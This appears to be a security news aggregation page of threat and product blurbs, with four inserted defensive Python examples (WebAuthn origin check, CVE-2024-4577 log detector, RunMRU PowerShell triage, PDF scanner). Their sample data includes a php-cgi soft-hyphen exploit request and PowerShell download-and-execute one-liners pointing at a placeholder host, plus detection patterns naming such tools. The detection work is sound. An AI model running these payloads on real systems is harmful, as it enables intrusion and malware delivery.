
November 2024

Embracing Conscious Leadership and Generative AI Transformation with Aysha Khan of Treasure Data

Welcome to the Data Security Decoded podcast, brought to you by Rubrik Zero Labs. In each episode, we discuss cybersecurity with thought leaders and industry experts, and get their take on trends, themes, and how they see data security evolving. This is a must-listen for security and IT leaders looking to better understand trends shaping data security and how they can achieve cyber resilience.

Everything you need to know about EvilProxy Attacks

An “Evil Proxy” is a malicious reverse proxy that attackers place between a victim and a legitimate server, relaying the traffic in both directions so that they can intercept and alter it. EvilProxy is sold as Phishing-as-a-Service (PhaaS): the operators deceive individuals into entering sensitive information such as usernames, passwords and credit card numbers on a look-alike site, and because the proxy sees the live session it can also capture the session cookies issued after a successful login.
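The reason proxy-based phishing of this kind fails against FIDO2/WebAuthn is that the browser bakes the page's actual origin into the data the authenticator signs. The following added example (not code from the original page or from any EvilProxy analysis) shows the relying-party side of that check: the domain names, the fixed challenge and the skipped signature verification are assumptions made to keep the example self-contained.

```python
import base64
import hashlib
import json

# Assumed relying party for this example (not from the original page)
EXPECTED_ORIGIN = "https://login.example.com"
EXPECTED_RP_ID = "login.example.com"
# Constructed per-login challenge; a real RP draws a fresh os.urandom(32) per ceremony
CHALLENGE = b"\x01" * 32


def b64url_encode(b: bytes) -> str:
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def make_client_data(origin: str, challenge: bytes) -> str:
    """What the victim's browser builds and the authenticator signs over:
    the origin the page was actually loaded from is baked in here."""
    cd = {"type": "webauthn.get", "challenge": b64url_encode(challenge), "origin": origin}
    return b64url_encode(json.dumps(cd).encode())


def make_auth_data(rp_id: str, flags: int = 0x01, counter: int = 1) -> bytes:
    """authenticatorData = SHA-256(rpId) || flags || signCount (big-endian)."""
    return hashlib.sha256(rp_id.encode()).digest() + bytes([flags]) + counter.to_bytes(4, "big")


def check_assertion(client_data_b64: str, auth_data: bytes, expected_challenge: bytes):
    """Relying-party checks from the WebAuthn assertion-verification procedure.
    The signature check over authData || SHA-256(clientDataJSON) is omitted here
    (assumption for brevity): the point is that origin is part of the signed data,
    so a proxy cannot rewrite it without invalidating the signature."""
    cd = json.loads(b64url_decode(client_data_b64))
    if cd.get("type") != "webauthn.get":
        return False, "wrong ceremony type"
    if b64url_decode(cd.get("challenge", "")) != expected_challenge:
        return False, "challenge mismatch (replay or wrong session)"
    if cd.get("origin") != EXPECTED_ORIGIN:
        return False, f"origin mismatch: browser signed for {cd.get('origin')!r}"
    if auth_data[:32] != hashlib.sha256(EXPECTED_RP_ID.encode()).digest():
        return False, "rpIdHash mismatch"
    if not auth_data[32] & 0x01:
        return False, "user-presence flag not set"
    return True, "ok"


def demo():
    genuine = check_assertion(make_client_data(EXPECTED_ORIGIN, CHALLENGE),
                              make_auth_data(EXPECTED_RP_ID), CHALLENGE)
    # The victim reached the login page through the proxy at a look-alike domain:
    # the browser records that domain as the origin, whatever the proxy relays upstream
    proxied = check_assertion(make_client_data("https://login-example.com", CHALLENGE),
                              make_auth_data(EXPECTED_RP_ID), CHALLENGE)
    return {"genuine": genuine, "proxied": proxied}


if __name__ == "__main__":
    for name, (ok, why) in demo().items():
        print(f"{name}: {'accepted' if ok else 'rejected'} ({why})")
```

Contrast this with a one-time code or push approval: the proxy simply relays those to the real server unchanged, which is exactly what makes the credentials and the resulting session cookie capturable.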

Understanding TellYouThePass Ransomware: A Growing Threat in 2024

TellYouThePass ransomware, first seen in 2019, is once again in the spotlight due to its recent activity. It has been observed exploiting CVE-2024-4577, a critical argument-injection flaw in PHP's CGI mode on Windows, while the family as a whole has historically put both Windows and Linux systems at risk. The malware uses web shells and fileless techniques to gain entry and establish a foothold, highlighting the need for robust cybersecurity measures.
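CVE-2024-4577 smuggles php-cgi command-line switches through the query string: when the query contains no literal `=`, php-cgi treats it as `+`-separated arguments, and on Windows code pages the soft hyphen (0xAD) is "best-fit" mapped to `-`, which revives the CVE-2012-1823 `?-d` vector. The following log-triage routine is an added example, not code from the original page or from any TellYouThePass analysis; the log lines are constructed, and the set of "sensitive" php.ini directives is an assumption.

```python
import re
from urllib.parse import unquote_to_bytes

# php.ini directives that, passed via "-d", turn php-cgi into a code-execution primitive (assumed list)
SENSITIVE_INI = {"allow_url_include", "auto_prepend_file", "auto_append_file",
                 "cgi.force_redirect", "disable_functions", "open_basedir"}

LOG_REQ = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def detect_cgi_arg_injection(target: str):
    """Return a finding for a request target that smuggles php-cgi command-line
    arguments through the query string, or None."""
    if "?" not in target:
        return None
    path, _, query = target.partition("?")
    # php-cgi only treats the query string as argv when it contains no literal '=',
    # which is why exploit requests encode it as %3d instead
    if "=" in query:
        return None
    raw = unquote_to_bytes(query)
    # Windows "best fit" mapping (the CVE-2024-4577 bypass of the CVE-2012-1823 fix):
    # soft hyphen U+00AD becomes ASCII '-'. Fold both its percent-decoded byte 0xAD
    # and its UTF-8 form C2 AD before looking for switches.
    folded = raw.replace(b"\xc2\xad", b"-").replace(b"\xad", b"-")
    args = folded.decode("latin-1").split("+")
    flags = [a for a in args if a.startswith("-") and len(a) > 1]
    if not flags:
        return None
    directives = [a.split("=", 1)[0] for a in args if a.split("=", 1)[0] in SENSITIVE_INI]
    return {
        "path": path,
        "args": args,
        "flags": flags,
        "directives": directives,
        # True when the request relied on the soft-hyphen trick (2024 variant);
        # False for a plain "?-d"/"?-s" request (the 2012 shape)
        "soft_hyphen_bypass": b"\xad" in raw,
    }


def scan_log_lines(lines):
    findings = []
    for line in lines:
        m = LOG_REQ.search(line)
        if not m:
            continue
        finding = detect_cgi_arg_injection(m.group("target"))
        if finding:
            finding["line"] = line
            findings.append(finding)
    return findings


# Constructed Apache-style access-log lines; addresses are documentation ranges
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jun/2024:03:14:07 +0000] "POST /php-cgi/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.2 - - [10/Jun/2024:03:15:01 +0000] "GET /index.php?page=home&id=42 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Jun/2024:03:16:22 +0000] "GET /test.php?-s HTTP/1.1" 200 900 "-" "curl/8.0"
""".splitlines()


if __name__ == "__main__":
    for f in scan_log_lines(SAMPLE_LOG):
        print(f["path"], f["flags"], f["directives"], "soft-hyphen" if f["soft_hyphen_bypass"] else "plain")
```

Pair a hit on `auto_prepend_file=php://input` with the POST body if the server logs it: that body is the PHP the attacker executed, and in the TellYouThePass cases it is the stage that drops the web shell.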

Stay ahead of cybercrime and ransomware with Zerto 10's encryption detection

In the time it takes you to finish this post — perhaps even this sentence — it is more than likely that ransomware will disrupt yet another business, causing extensive delays and irrevocable damage. Across the globe, ransomware attacks continue to increase in frequency, sophistication, and consequence, littering headlines with cautionary tales and sobering statistics. Over the next decade, Cybersecurity Ventures predicts that global ransomware damage will grow by 30 percent annually.

Cybersecurity in Gaming: protecting players and virtual assets from growing threats

Cybersecurity is becoming a critical necessity in today's world, where technology is used in virtually every aspect of life. Every year, the number of cyberattacks grows, and the methods of attackers are becoming more sophisticated. Protecting personal data, financial information and corporate secrets requires reliable technologies and increased attention from users. The gaming industry is also an important area that needs protection.

Artificial Intelligence in Cybersecurity: Threat or Advantage?

In today's hyperconnected world, cybersecurity stands as the first line of defense against the growing tide of cyber threats. With billions of devices connected globally, protecting sensitive information has never been more critical, or more complex. Enter artificial intelligence (AI), a technology capable of reshaping cybersecurity. But as with all powerful tools, AI is a double-edged sword: it holds real potential to bolster defenses, yet it can also amplify the capabilities of cybercriminals.

Why Healthcare Must Urgently Enhance Data Security

In this episode of CISO Conversations: EU Data Regulations, Nicolas Groh, Field CTO at Rubrik, is joined by Anastasiya Kiseleva, a PhD Researcher in Law, Health and Technology at the Vrije Universiteit Brussel, John Noble, Former Non-Executive Director at NHS England, and Dr. Stefan Buttigieg, Resident Specialist in Public Health Medicine at the Ministry for Health and Active Aging in Malta.

How Are People Targeted With Malware

Malicious software, also known as malware, is a program designed to harm computer systems and devices. Cybercriminals target individuals with malware by creating spoofed websites, sending fake emails or messages, executing drive-by download attacks, or deceiving users into downloading programs from a fake source. Learn more about how malware is delivered and how to prevent malware attacks.

Cracking Braodo Stealer: Analyzing Python Malware and Its Obfuscated Loader

Braodo Stealer is one of the many active and evolving malware families designed to steal sensitive information, such as credentials, cookies, and system data, from compromised machines. Typically written in Python, this malware employs a variety of obfuscation techniques to conceal its true intentions, making it challenging for security solutions to identify.

ContFRaversy in Ransomland: Tor-based site emerges for new French-speaking RaaS operation "ContFR"

Following the emergence of data-leak sites (DLSs) for the extortion groups Kairos, Chort, and Termite, Cyjax has observed the emergence of a Tor-based site belonging to a new French-speaking Ransomware-as-a-Service (RaaS) operation called “ContFR”. The name potentially references the well-known ransomware group Conti, whilst incorporating a reference to France.

Ransomware Gangs Evolve: They're Now Recruiting Penetration Testers

A new and concerning cybersecurity trend has emerged. According to the latest Q3 2024 Cato CTRL SASE Threat Report from Cato Networks, ransomware gangs are now actively recruiting penetration testers to enhance the effectiveness of their attacks. This development signals a significant shift in the tactics employed by cybercriminals and underscores the need for organizations to remain vigilant in their defense strategies.

Python NodeStealer Targets Facebook Ads Manager with New Techniques

In September 2024, Netskope Threat Labs reported a Python-based NodeStealer targeting Facebook business accounts. NodeStealer collects Facebook and other credentials stored in the browser and its cookie data. For over a year, we have tracked and discovered multiple variants of this infostealer. It is now targeting new victims and extracting new information using new techniques. In this blog post, we will dissect the development of the Python NodeStealer from multiple samples in the wild.

Unveiling LIMINAL PANDA: A Closer Look at China's Cyber Threats to the Telecom Sector

On Tuesday, November 19, 2024, Adam Meyers, CrowdStrike Senior Vice President of Counter Adversary Operations, will testify in front of the U.S. Senate Judiciary Subcommittee on Privacy, Technology, and the Law on Chinese cyber threats to critical infrastructure. Within his testimony, Adam will speak publicly for the first time about a China-nexus state-sponsored actor that CrowdStrike Counter Adversary Operations tracks as LIMINAL PANDA.

DSPM vs DLP: Unraveling the Differences

In this episode of Into the Breach, James Purvis and Drew Russell discuss the key differences between Data Loss Prevention (DLP) and Data Security Posture Management (DSPM). Drew explains that while DLP focuses on perimeter security, DSPM secures data at rest, offering a more proactive approach. Using a clever analogy, Drew illustrates how DSPM prevents issues before they occur, unlike DLP's reactive measures. They conclude by highlighting how both can work together to enhance data security.

Understanding Polymorphic Viruses and Polymorphic Malware

Polymorphic viruses and polymorphic malware represent some of the most sophisticated challenges in modern cybersecurity. These types of malware are designed to evade traditional security measures by constantly changing their appearance, making them particularly difficult to detect and eliminate.

Akira Ransomware: Published Over 30 New Victims on their DLS

The Akira ransomware group has been active since March 2023, targeting diverse industries across North America, the UK, and Australia. Operating as a Ransomware-as-a-Service (RaaS) model, Akira employs a double-extortion strategy by stealing sensitive data before encrypting it. According to their leak site, the group claims to have compromised over 350 organizations.

CARBANAK (aka ANUNAK) Distributed via IDATLOADER (aka HIJACKLOADER)

IDATLOADER (aka HIJACKLOADER, GHOSTPULSE) has become prevalent in 2024, using advanced and new techniques such as BPL Sideloading, which Kroll reported on in June. Kroll observes IDATLOADER distributing malware such as ASYNCRAT, PURESTEALER, REMCOS, STEALC and what some might describe as a recent epidemic in LUMMASTEALER infections.

Half of all Ransomware Attacks This Year Targeted Small Businesses

New data shows just how crippling ransomware has been on small businesses that have fallen victim to an attack and needed to pay the ransom. Logic would normally dictate that ransomware gangs are going to go after the “big fishes” – the larger organizations with deep pockets. But with the advent of the “as a service” model of ransomware, threat actors have found a niche, with many of them focusing on businesses with 1 to 50 employees.

ElizaRAT and Beyond: The Evolution of APT36's Malware Arsenal

APT36, also known as Transparent Tribe, is a well-known cyber espionage group attributed to Pakistan. Active since 2013, this advanced persistent threat (APT) group has focused its efforts primarily on Indian government sectors, including defense, education, and key infrastructure. APT36 has demonstrated consistent sophistication in their tactics, evolving their methods to target a wide array of platforms and systems.

AI Governance and Global Cyber Resilience

In this episode of CISO Conversations: EU Data Regulations, Richard Cassidy, EMEA Field CISO at Rubrik, is joined by Anu Bradford, Professor of Law at Columbia Law School, and Bronwyn Boyle, Chief Information Security Officer at PPRO. They discuss the importance of resilience and regulatory compliance as critical factors for organizations to manage their cyber threats and bolster cyber defense.

Criminal Threat Actor Uses Stolen Invoices to Distribute Malware

Researchers at IBM X-Force are tracking a phishing campaign by the criminal threat actor “Hive0145” that’s using stolen invoice notifications to trick users into installing malware. Hive0145 acts as an initial access broker, selling access to compromised organizations to other threat actors who then carry out additional cyberattacks.

Evasive malware has grown by 168% causing direct impact on cybersecurity

With a 168% rise in evasive malware, cyber threats have reached a new level of sophistication. This type of malware employs advanced techniques to evade detection by traditional solutions, which often rely on pre-defined signatures to identify threats. These malicious programs pose a major challenge in cybersecurity by camouflaging themselves within legitimate processes and acting stealthily.

Nation-State Threat Actors Rely on Social Engineering First

A new report from ESET has found that most nation-state threat actors rely on spear phishing as a primary initial access technique. In the second and third quarters of 2024, state-sponsored APTs from China, Russia, Iran, and North Korea used social engineering attacks to compromise their targets. Iranian threat actors continued conducting cyber espionage against countries across the Middle East, Europe, and the US. They also expanded their targeting to hit financial companies in Africa.

The 3-2-1-1 Strategy: Protecting Your Backups Against Ransomware with NAKIVO

Following the 3-2-1-1 backup rule can ensure your Microsoft 365 data is protected and readily recoverable in any scenario, whether accidental data deletion or even ransomware encryption. Watch this short video to see how you can easily create multiple backup copies of Microsoft 365 data to comply with the 3-2-1-1 backup rule using NAKIVO Backup & Replication.

LUMMASTEALER Delivered Via PowerShell Social Engineering

The Kroll Security Operations Center (SOC) has recently detected and remediated a trend of incidents that involved socially engineering a victim into pasting a PowerShell script into the “Run” command window to begin a compromise. These incidents have typically begun with the victim user attempting to find “YouTube to mp3” converters, or similar, then being redirected to the malicious webpages.
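Whatever the victim pastes into the Run window is recorded in the user's RunMRU registry key, which makes it one of the quickest triage sources for this kind of compromise. The following added example (not code from the original page or from Kroll) scores RunMRU entries against a set of indicators that are my assumptions about what such pasted one-liners typically contain, and decodes `-EncodedCommand` payloads so the indicators can be matched on the plaintext too. The dictionary is a constructed export; on a live host you would populate it from `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU` (for instance with Python's `winreg` module).

```python
import base64
import re
from typing import Optional

# Heuristics for commands typed into Win+R by a socially engineered user (assumed list)
INDICATORS = {
    "hidden_window":   re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I),
    "bypass_policy":   re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I),
    "encoded_command": re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I),
    "download":        re.compile(r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|curl|wget)\b", re.I),
    "eval":            re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "remote_url":      re.compile(r"https?://", re.I),
    "lolbin":          re.compile(r"\b(?:mshta|rundll32|regsvr32|certutil|bitsadmin)\b", re.I),
}


def decode_encoded_command(cmd: str) -> Optional[str]:
    """PowerShell -EncodedCommand takes base64 of UTF-16LE text; return the plaintext or None."""
    m = INDICATORS["encoded_command"].search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage_runmru(values: dict) -> list:
    """Walk RunMRU entries newest-first (MRUList order) and score each one.
    Each value's data ends in the literal two characters backslash-1, which is stripped."""
    results = []
    for slot in values.get("MRUList", ""):
        raw = values.get(slot, "")
        cmd = raw[:-2] if raw.endswith("\\1") else raw
        decoded = decode_encoded_command(cmd)
        text = cmd + ("\n" + decoded if decoded else "")
        hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
        results.append({
            "slot": slot,
            "command": cmd,
            "decoded": decoded,
            "indicators": hits,
            # a bare "powershell" is common; two or more indicators is the threshold used here
            "suspicious": len(hits) >= 2,
        })
    return results


# Constructed sample export. The encoded payload is built here for readability;
# in a real incident it arrives pre-encoded on the lure page. example.invalid is a reserved name.
ENCODED = base64.b64encode('iex (irm "https://example.invalid/a")'.encode("utf-16-le")).decode()
SAMPLE_RUNMRU = {
    "MRUList": "dcab",
    "a": "notepad\\1",
    "b": "cmd\\1",
    "c": 'powershell -w hidden -c "iwr -useb https://example.invalid/x.ps1 | iex"\\1',
    "d": f"powershell -ep bypass -enc {ENCODED}\\1",
}


if __name__ == "__main__":
    for r in triage_runmru(SAMPLE_RUNMRU):
        print(r["slot"], "SUSPICIOUS" if r["suspicious"] else "ok", r["indicators"])
        if r["decoded"]:
            print("   decoded:", r["decoded"])
```

Corroborate a hit with the matching `explorer.exe -> powershell.exe` parent-child process event; the RunMRU entry alone does not prove the command ran, and the process tree alone does not show the user pasted it.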

Enabling Backup Encryption with NAKIVO: A Comprehensive Guide

Encryption is widely used for security purposes because it prevents unauthorized third parties from accessing and disseminating private data. Backups are no exception and are often a target of data breaches. As part of a data protection strategy, you can implement encryption as an additional layer of security for your backups.

Detect and Protect Strategies for Malware Free Websites and APIs

Over 1 billion known malware threats exist, with an alarming 17 million new variants emerging each month! Malware targeting customer-facing websites and API applications poses significant risks, including compliance violations, defacements, and even blacklisting. In this webinar, join Vivekanand Gopalan, VP of Products at Indusface, as he shares effective strategies for safeguarding websites and APIs against malware.

Is Your Social Media Growth Safe? Navigating Security Risks of Buying Followers and Likes

In today's hyper-connected world, social media platforms like Instagram and TikTok have become essential tools for personal branding, business marketing, and even social influence. With the rising importance of social media metrics such as follower counts and likes, there's been a surge in individuals and brands purchasing followers and likes to boost their online image. However, this seemingly quick way to boost social media presence comes with notable risks. When buying followers, ensuring social media security is crucial, as these practices can open doors to security vulnerabilities, account bans, and even reputational damage.

Analyzing Play and LockBit: The Top Ransomware Threats Facing Retailers

This blog is the latest in a series that delves into the deep research conducted daily by the Trustwave SpiderLabs team on major threat actor groups currently operating globally. Retailer databases are chock-full of information that makes them highly attractive targets for ransomware gangs, as highlighted by Trustwave SpiderLabs in its recent 2024 Trustwave Risk Radar Report: Retail Sector.

Going Rogue: APT29 Using Rogue RDP | Threat SnapShot

In 2022, Microsoft began blocking macros originating from the internet in Office, pushing both pentesters and threat actors to explore new methods for initial access. Fast forward to October 2024, and APT29 is leveraging one of those methods, Rogue RDP, discovered as a workaround back in 2022. In this video, we dive into a recent spearphishing campaign uncovered by the Ukrainian CERT, where attackers used Rogue RDP to gain initial access to targets. The video provides practical detection opportunities that can be used to hunt for this activity in your environment.

Can Viruses Come From a PDF?

Yes, a virus can come from a PDF: malicious code can be hidden inside the file. A virus is a type of malware, which is malicious software intended to infect your device and steal private data. A virus can infect your device only if you interact with it, which could happen by opening a PDF containing one. Since PDFs are so widely used, hackers can hide viruses within innocent-looking files to jeopardize your privacy.
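In practice the "code" hides in a handful of PDF constructs: JavaScript actions, actions that fire on open, launch actions and embedded files, with names sometimes hex-escaped (`/J#61vaScript`) to dodge naive string matching. The following added example (not code from the original page) is a pdfid-style static screen over a PDF's bytes; the two PDFs are constructed inline and the risky-name list and flag thresholds are my assumptions.

```python
import re

# PDF name objects whose presence warrants a closer look (assumed, pdfid-style list)
RISKY_NAMES = {
    "/JavaScript":   "document-level or action JavaScript",
    "/JS":           "inline JavaScript payload",
    "/OpenAction":   "action executed when the document is opened",
    "/AA":           "additional actions (page open, form events)",
    "/Launch":       "launch an external program or file",
    "/EmbeddedFile": "file attachment carried inside the PDF",
    "/RichMedia":    "embedded rich media (historically Flash)",
    "/ObjStm":       "object streams, which can hide the names above",
}
# A name must end at a non-name character so /JS does not match inside /JSfoo
NAME_PATTERNS = {n: re.compile(re.escape(n).encode() + rb"(?![A-Za-z0-9_])") for n in RISKY_NAMES}
# PDF permits #xx hex escapes inside names (/J#61vaScript == /JavaScript), a common evasion
HEX_ESCAPE = re.compile(rb"#([0-9A-Fa-f]{2})")


def normalize_names(data: bytes) -> bytes:
    return HEX_ESCAPE.sub(lambda m: bytes([int(m.group(1), 16)]), data)


def scan_pdf(data: bytes) -> dict:
    """Count risky names after folding hex escapes and derive a few triage flags.
    This is a static screen, not a verdict: benign forms use /AA and /OpenAction too."""
    norm = normalize_names(data)
    counts = {n: len(rx.findall(norm)) for n, rx in NAME_PATTERNS.items()}
    flags = []
    if counts["/JavaScript"] or counts["/JS"]:
        flags.append("javascript")
    if counts["/OpenAction"] or counts["/AA"]:
        flags.append("auto-action")
    if counts["/Launch"]:
        flags.append("launch")
    if counts["/EmbeddedFile"]:
        flags.append("attachment")
    if norm != data:
        flags.append("hex-escaped names")
    return {
        "is_pdf": data.startswith(b"%PDF-"),
        "counts": counts,
        "flags": flags,
        # script that runs without the user clicking anything: the classic malicious-PDF shape
        "auto_executing_code": "javascript" in flags and "auto-action" in flags,
    }


# Constructed minimal PDFs (no xref table; enough structure for the scanner)
SAMPLE_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >> endobj
4 0 obj << /S /J#61vaScript /JS (app.alert('constructed sample, harmless')) >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""
BENIGN_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""


if __name__ == "__main__":
    for label, pdf in (("sample", SAMPLE_PDF), ("benign", BENIGN_PDF)):
        r = scan_pdf(pdf)
        print(label, r["flags"], "AUTO-EXEC" if r["auto_executing_code"] else "")
```

Names inside compressed object streams (`/ObjStm`) or FlateDecode'd content are invisible to this scan, so a zero count with `/ObjStm` present is a reason to inflate the streams and rescan, not a clean bill of health.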

BlackBasta Ransomware Gang Uses New Social Engineering Tactics To Target Corporate Networks

ReliaQuest warns that the BlackBasta ransomware gang is using new social engineering tactics to obtain initial access within corporate networks. The threat actor begins by sending mass email spam campaigns targeting employees, then adding people who fall for the emails to Microsoft Teams chats with external users. These external users pose as IT support or help desk staff, and send employees Microsoft Teams messages containing malicious QR codes.

How to Prevent Ransomware on Networks: Proven Strategies for Protection

Organizations around the world are increasingly vulnerable to ransomware attacks, expected to cause over $20 billion in damages by the end of 2024. These cyber attacks are capable of shutting down entire networks, disrupting services, and inflicting severe financial and reputational damage. Knowing how to prevent ransomware on networks is essential in safeguarding against these dangers.

Why Compliance Costs Less Than Non-Compliance #cisoconversations #eudataregulations #nis2 #shorts

NIS2 non-compliance carries hefty penalties. The stakes are high: fines can reach at least 10 million euros or 2% of worldwide annual turnover. But here's the thing: the cost of compliance is generally much lower than these penalties. You can learn more about the topic in the latest episode of CISO Conversations: EU Data Regulations with Madeline Bennett and Richard Cassidy.